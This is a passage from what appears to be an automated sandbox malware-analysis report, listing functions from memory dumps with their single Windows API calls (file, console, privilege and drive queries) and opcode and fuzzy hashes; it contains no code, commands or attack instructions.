                                                        • Opcode ID: 57e155fcf8df2c648a9a596b45a4ecf80a610b33b8e199a4f8dcc95bce988596
                                                        • Instruction ID: 3885b840cea17faf45491e6889dffab70881030e9f031d5c9346162b5ba5ba7a
                                                        • Opcode Fuzzy Hash: 57e155fcf8df2c648a9a596b45a4ecf80a610b33b8e199a4f8dcc95bce988596
                                                        • Instruction Fuzzy Hash: EF216D7150D7C09FEB13CB25DC55B96BFB4AF03224F0D84DAE9888F293D2659848CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: 5bb3539b5fc811ccdb1f0205b73d270fa485a45a7bedd235f147010cc347aae2
                                                        • Instruction ID: 3152d44296edf20279c3bf2625c5dc9a7ab56d5d2f172f07327a8a026eda97eb
                                                        • Opcode Fuzzy Hash: 5bb3539b5fc811ccdb1f0205b73d270fa485a45a7bedd235f147010cc347aae2
                                                        • Instruction Fuzzy Hash: 5721A4715093C09FEB128F25DC55B92BFA4EF07310F0984DBDD858F163D224A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0057AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 662bf34e00fec10754516d5cda010b488ef32964630263840063a74a77404b60
                                                        • Instruction ID: e133ef804d92a00e9ae14c13f2cfa595c83ac0df55129f7178807bc19b5025f1
                                                        • Opcode Fuzzy Hash: 662bf34e00fec10754516d5cda010b488ef32964630263840063a74a77404b60
                                                        • Instruction Fuzzy Hash: 9F2172B16053809FD721CF25DC44B56FFA8EF56210F0884AAED49CB252D265E808DB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E810D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 01E81148
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: afd4e6e14ab8c65daf3eb6e433e3c178f46a86cf2627d755d51d72cd07397def
                                                        • Instruction ID: 5a2004954ae0357d43060375b1e81698bf7edafa300055dc39363c17e9d5d503
                                                        • Opcode Fuzzy Hash: afd4e6e14ab8c65daf3eb6e433e3c178f46a86cf2627d755d51d72cd07397def
                                                        • Instruction Fuzzy Hash: 15216D6140D3C09FE7138B259C54A62BFB4EF57624F0980DBD8898F2A3D2695809D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: a2f489ca809a6d442d905bfd8ffde6082c2d12e56552db37868eed3b3d7ff5d3
                                                        • Instruction ID: 1ad36f608ac7fa7d2cec66b9b3a20f2f18d7d1e5f0f1a6ab457f4e374ca38c34
                                                        • Opcode Fuzzy Hash: a2f489ca809a6d442d905bfd8ffde6082c2d12e56552db37868eed3b3d7ff5d3
                                                        • Instruction Fuzzy Hash: A011BF72500300EFFB21DF55DC85BABFBA8EF44720F14C46AE9098A281D670A9049BB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0057BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: c3ad4cc59786e54bb380be0d5bbc9a426c7153ea631bdba4e77c141bfa33ef61
                                                        • Instruction ID: 9efa1b193b2ebb91d9d9bb99dffbfdc30b4af0d8dde98c045af4048ca4f4f565
                                                        • Opcode Fuzzy Hash: c3ad4cc59786e54bb380be0d5bbc9a426c7153ea631bdba4e77c141bfa33ef61
                                                        • Instruction Fuzzy Hash: 41116D72508384AFDB22CF65DC45B53FFF4FF15210F0884AAE9898B662D375A818DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 01E808E5
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 62f230d7bc8f95c92f1797a22f141bff3a0ba2a5bf64146d8d6acf3f572340d5
                                                        • Instruction ID: d33f560864a0d32e8420b494a7fd6b2e062c320f869b366072dc752a9a52727e
                                                        • Opcode Fuzzy Hash: 62f230d7bc8f95c92f1797a22f141bff3a0ba2a5bf64146d8d6acf3f572340d5
                                                        • Instruction Fuzzy Hash: 1211C172400300EFFB21DF55DC45FAAFBA8EF44720F08856AFD499A241D671A508CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 0057A39C
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 4a7b8c42eeff72ded21bd03b4bef1bf0d75e4ffe481bd739634164e096508724
                                                        • Instruction ID: 0c02b644d871dd446bcbe5086e9645984348aab3c241b921622cad58ad8693c9
                                                        • Opcode Fuzzy Hash: 4a7b8c42eeff72ded21bd03b4bef1bf0d75e4ffe481bd739634164e096508724
                                                        • Instruction Fuzzy Hash: 72118F714093C09FE7128F15DC54A62FFB4EF47614F0884DAEDC94F263D265A808DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E812D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01E8132F
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 8d054fea2ffa6bd57ac44897859b472f168ac56859c4434b71087e66f2c8274d
                                                        • Instruction ID: c2bb9a566bf48de88b2e502139f4af9c0c315e3616cef18142d9681388c6e571
                                                        • Opcode Fuzzy Hash: 8d054fea2ffa6bd57ac44897859b472f168ac56859c4434b71087e66f2c8274d
                                                        • Instruction Fuzzy Hash: 4911C1715083809FDB128F25DC45B96FFA4EF06220F0984EEED498B262D235A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E805E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 01E80640
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 2b0a6cfb29a4ce14b7f937a6cec6481b10039a7283189f3c7a70057eadd3050f
                                                        • Instruction ID: 8d2e0606b1794b6ebc32deaa26b5271d37ae6dbe6981a9f380b5f95b661dd077
                                                        • Opcode Fuzzy Hash: 2b0a6cfb29a4ce14b7f937a6cec6481b10039a7283189f3c7a70057eadd3050f
                                                        • Instruction Fuzzy Hash: D411C2755093C09FDB128B15DC95B52FFB4EF42224F0880EBED898B663D265A908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0057AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: fead8567481910ad272937d88c3ad0275d27c98f84292a9b4f830bd2265e01ef
                                                        • Instruction ID: dca8135a709749cef6eea9e2765ecc60a323ea83b09942efab1e802e63b7cf30
                                                        • Opcode Fuzzy Hash: fead8567481910ad272937d88c3ad0275d27c98f84292a9b4f830bd2265e01ef
                                                        • Instruction Fuzzy Hash: FF113CB16002009FEB20DF26EC85B5AFB98EB54621F08C46AED0DCB641D674E804DA62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 0057AA71
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 1844534586d07bc6933b322d0aa2155dc7baac52ae7ca880f2e053d8597cbb1a
                                                        • Instruction ID: 9524c508dde396b4ab022555e7553d1606e9a2d263584d72106ca55bb41e2861
                                                        • Opcode Fuzzy Hash: 1844534586d07bc6933b322d0aa2155dc7baac52ae7ca880f2e053d8597cbb1a
                                                        • Instruction Fuzzy Hash: 2A11C17540D7C09FE7128B11DC85A92BFA0EF53320F0980DBDD888F163D268A909D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E8092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 01E8099C
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 7c08bf1f7e7104f22042ebfa30a72c6f227457f4bfa555d2eff27e7c3aed2b2e
                                                        • Instruction ID: 91edb87ea72f9edded5f80c6eee0cec2d34f3bf6a16037da7b32edffa1594bf3
                                                        • Opcode Fuzzy Hash: 7c08bf1f7e7104f22042ebfa30a72c6f227457f4bfa555d2eff27e7c3aed2b2e
                                                        • Instruction Fuzzy Hash: F71190714093C09FE7228B25DC55B92FFA4EF47324F0980DAD9884B163C265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E807C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 01E80819
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: b6d700097b7e1ef150475771c56e87e1f8ff426153ed8fcbaf144676e668680e
                                                        • Instruction ID: 862ecd6dc6df00edc64b1e2554d8c6fbb8dd2fc4e17bacb236b36d7c0937381c
                                                        • Opcode Fuzzy Hash: b6d700097b7e1ef150475771c56e87e1f8ff426153ed8fcbaf144676e668680e
                                                        • Instruction Fuzzy Hash: C8018071500744EFFB21AF15DD85FAAFB98EF44720F1480A6FD0D9A242D674A9488AA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E813AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 40ce45e9c6c099cf3b8d915229f3559fb9ff85dbdfccc6d7ddcbaa308f1f50cf
                                                        • Instruction ID: 45b4d548d859790362d27129b41bad60eb1fe49a606c73877d848efc5329b6e8
                                                        • Opcode Fuzzy Hash: 40ce45e9c6c099cf3b8d915229f3559fb9ff85dbdfccc6d7ddcbaa308f1f50cf
                                                        • Instruction Fuzzy Hash: 1111A175500700DFEB21DF5ADC85B6AFBA4EF04220F0884AEDD4D8B652D271E419CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 0057ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 51fac7e9070b9c8bdcf3d524a72fef6d1174a4f88b3c8c9502125d39a43a1c99
                                                        • Instruction ID: 7a68423addb6c9f57fc64d13af9177d41486bf76cd7886a07814b54fc0464016
                                                        • Opcode Fuzzy Hash: 51fac7e9070b9c8bdcf3d524a72fef6d1174a4f88b3c8c9502125d39a43a1c99
                                                        • Instruction Fuzzy Hash: EA1173B55093809FD711CF55DC45B92BFA4EF51324F0984ABDD488F153D2759908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0057BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 3c096a0133ecfa6122adb3f82d57f84794e7164bcc02b9b3e9881a1be753dbee
                                                        • Instruction ID: e804448c0b4bcf511e181ce9643eeb32d5d5ab252b3046a3ad227165d3b67584
                                                        • Opcode Fuzzy Hash: 3c096a0133ecfa6122adb3f82d57f84794e7164bcc02b9b3e9881a1be753dbee
                                                        • Instruction Fuzzy Hash: 1C114872500600DFEB209F55D844B52FFA4FB14310F0888AAD9898A612D371A414EB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0057A23E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: f60f342710eb045b11deecab18ba069e94c6583a120992a16c359a7ebbc1ff7c
                                                        • Instruction ID: 181326c759a9b921516ad7eee0acef457375111b17504eb2c51476f7b2c9650b
                                                        • Opcode Fuzzy Hash: f60f342710eb045b11deecab18ba069e94c6583a120992a16c359a7ebbc1ff7c
                                                        • Instruction Fuzzy Hash: 6F018471900600EFE310DF16DC46B66FBA8FF84A20F14816AED089B741D235F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E8104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01E8109E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: c11cd0f2939acda13a8db977c9936e59a2221c8a1d5c80631e177b4ff66059f8
                                                        • Instruction ID: 21465d936c7aed5a0b7b6e135a734bb70dc10ec33241828cf747ace5f6df39cb
                                                        • Opcode Fuzzy Hash: c11cd0f2939acda13a8db977c9936e59a2221c8a1d5c80631e177b4ff66059f8
                                                        • Instruction Fuzzy Hash: EA017171900600AFE310DF16DC46B66FBA8FB84A20F14816AED099B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 01E801D0
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: c618591e9b3c1230ea37cb2543fa517b5c02736f8d46c34d44e82da3d4393064
                                                        • Instruction ID: ea335f0914c446c996e8ab2b26bc4b679429ebc8571bd27cceffc077beb926b1
                                                        • Opcode Fuzzy Hash: c618591e9b3c1230ea37cb2543fa517b5c02736f8d46c34d44e82da3d4393064
                                                        • Instruction Fuzzy Hash: 72015E71604744DFEB10EF6ADC857AAFBD8EF05624F0884AAED0DCB642D674E508CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: ca09270193e10a2e2b841ee85767d2dd2c44de65bdfc80eec7771612bbc758cc
                                                        • Instruction ID: 7031a1983ea9e39f078ad4b89e40a48e7d39a8aa5783e31207b60c851438ac4f
                                                        • Opcode Fuzzy Hash: ca09270193e10a2e2b841ee85767d2dd2c44de65bdfc80eec7771612bbc758cc
                                                        • Instruction Fuzzy Hash: 5701BC71900200DFEB208F55EC85BA6FFA4FF04720F08C4AADD4D8B256D375A804DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E812FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01E8132F
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 51fde1aec37f6e95c7db1859316d0bb9a0b127f4b3e8b5a36d33f8f73d92dc94
                                                        • Instruction ID: a2e7f6d402f57c2ff93e0db3679aaa3c4b68c30b55b81c5b8a53b609c0c0c566
                                                        • Opcode Fuzzy Hash: 51fde1aec37f6e95c7db1859316d0bb9a0b127f4b3e8b5a36d33f8f73d92dc94
                                                        • Instruction Fuzzy Hash: 9801F271904300DFEB20EF19DC85BAAFBE4EF04620F08C4AADC0D8B652D275E404CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0057A94A
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: a7eb0b19f514ba2c69cd79118cba980acc6e438c672fe493ca1aa534f8047d71
                                                        • Instruction ID: af092596af88e57e75b85171057c9873b3565327c7569d84db4ecf5b461be4b4
                                                        • Opcode Fuzzy Hash: a7eb0b19f514ba2c69cd79118cba980acc6e438c672fe493ca1aa534f8047d71
                                                        • Instruction Fuzzy Hash: 47016271900601EBE310DF16DC46B26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 01E80FB0
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: e9c8fdc64cc29c91d84cc7bb755eea5293ad069351ad7533463f2d9c536cac80
                                                        • Instruction ID: d2cdcc902efd23d83642faebb68219498eecd2cb77dee3cbcf1a85e5ef9db68e
                                                        • Opcode Fuzzy Hash: e9c8fdc64cc29c91d84cc7bb755eea5293ad069351ad7533463f2d9c536cac80
                                                        • Instruction Fuzzy Hash: 74017C71504740DFEB20EF19D885BAAFB94EF04664F08C4AAED0C8F246D274E448CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E804B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01E80502
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 2119ee2e5d8d5b927f4ba302f93be739cc128c5600a10ec958510d6179d64300
                                                        • Instruction ID: 15a06320e99f9f7de62951dd88d27e003539ff4f640b41f88bedd60160db4c36
                                                        • Opcode Fuzzy Hash: 2119ee2e5d8d5b927f4ba302f93be739cc128c5600a10ec958510d6179d64300
                                                        • Instruction Fuzzy Hash: 89016271900601EBE310DF16DC46F26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E8060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 01E80640
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: b3d96029cffa4bfbed8acc24aa0fd5633957ba4d0b75ba343646e5b27beaa6b0
                                                        • Instruction ID: 15b38c27a4e12a96e2ec54222e4f4a68c603c122164db10abf2f28418f5e24cd
                                                        • Opcode Fuzzy Hash: b3d96029cffa4bfbed8acc24aa0fd5633957ba4d0b75ba343646e5b27beaa6b0
                                                        • Instruction Fuzzy Hash: 7401F475500700CFEB209F19DC85766FBA0EF45628F18C0AAEC0E8BB52D274E408DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 0057ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 28c3f05074e404f3777cba25107d605174612de668586be2b8e392c7c9c1f932
                                                        • Instruction ID: 5f939e644faa1083f4453c26eae6db3bf80cecd9bc096c37597dd0a8495833cd
                                                        • Opcode Fuzzy Hash: 28c3f05074e404f3777cba25107d605174612de668586be2b8e392c7c9c1f932
                                                        • Instruction Fuzzy Hash: 0901AD71404240DFEB10DF55EC85B96FF94EF40220F18C4AADD0C8B202D274A804DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E81116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 01E81148
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: c8a7b63d93c8bae1afc90a0e0a2b83b7637c476e3ec10421888b1a4ca70b5559
                                                        • Instruction ID: 8b3f8d7db3ef50944fea60114c81fb07964cfbb6454e9e14c440c36203a16de1
                                                        • Opcode Fuzzy Hash: c8a7b63d93c8bae1afc90a0e0a2b83b7637c476e3ec10421888b1a4ca70b5559
                                                        • Instruction Fuzzy Hash: CCF0FF34500740DFEB20EF05DC85BAAFBE0EF04A21F08C09ACC0D4B316C275A449CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 0057A39C
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: de98e197ebe705bceddbe73938fe99cbf5443fa78763aa9c0af291ed499dcec3
                                                        • Instruction ID: 083ec26a36a742c868d4ad70a995f36fae643229cab67731394ad529fac79920
                                                        • Opcode Fuzzy Hash: de98e197ebe705bceddbe73938fe99cbf5443fa78763aa9c0af291ed499dcec3
                                                        • Instruction Fuzzy Hash: 15F0AF35504740DFEB209F06E889769FFA0EF44721F18C49ADD0D4B356D375A908EAA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E8096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 01E8099C
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 4bb0e836d3aa1222699e64c59cea01271af98dd82c4e69bce35cfa5469319f8d
                                                        • Instruction ID: 898654f994936f1f7866d82106ac127d04e165731ec0194471884f9579b91a6c
                                                        • Opcode Fuzzy Hash: 4bb0e836d3aa1222699e64c59cea01271af98dd82c4e69bce35cfa5469319f8d
                                                        • Instruction Fuzzy Hash: 02F0C235904740DFFB20EF06D88576AFBA0EF44725F08C09AED4D4B316D275A508CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 0057AA71
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: ca1d538b154053717fd9514435be06c887bbd5d317c8fbf5e696b63288d1f875
